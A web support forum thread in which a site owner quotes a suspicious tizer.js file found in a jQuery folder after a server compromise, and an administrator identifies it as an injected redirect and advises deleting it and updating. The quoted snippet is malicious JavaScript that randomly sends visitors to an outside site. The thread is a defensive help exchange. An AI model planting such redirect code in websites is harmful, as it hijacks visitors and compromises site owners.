tizer.js > Strange File found...
Sorry, you don't have permission to post posts. Log in, or register if you haven't yet.
Comments on tizer.js > Strange File found...
Beginner
Usergroup: Customer
Joined: Sep 27, 2010
Location: South Wales, UK
Total Topics: 3
Total Comments: 4
Hi,
I found a strange js file under the Jquery folder called tizer.js with this inside:
n=0;
m=15;
r=Math.floor(Math.random()*(n-m+1))+m;
if(r==1){
document.location.href='http://www.knockknockrecords.com/tizer.html';
}
What does it do and where did it come from???!!
We do have an attack on our server but all the other sites are infected with the same .htaccess file.
Help!
developer
Usergroup: Administrator
Joined: Dec 20, 2001
Location: Diamond Springs, California
Total Topics: 61
Total Comments: 7868
That's a hacker's file that redirects every 15th page load to their website. Delete it.
Beginner
Usergroup: Customer
Joined: Mar 04, 2004
Total Topics: 0
Total Comments: 1
This was also found on my server, do you have any suggestions for prevention?
Thanks Paul!
developer
Usergroup: Administrator
Joined: Dec 20, 2001
Location: Diamond Springs, California
Total Topics: 61
Total Comments: 7868
Run the latest 5.0, 5.1 or 6.0 series release. The recent security patches should be preventing new infections.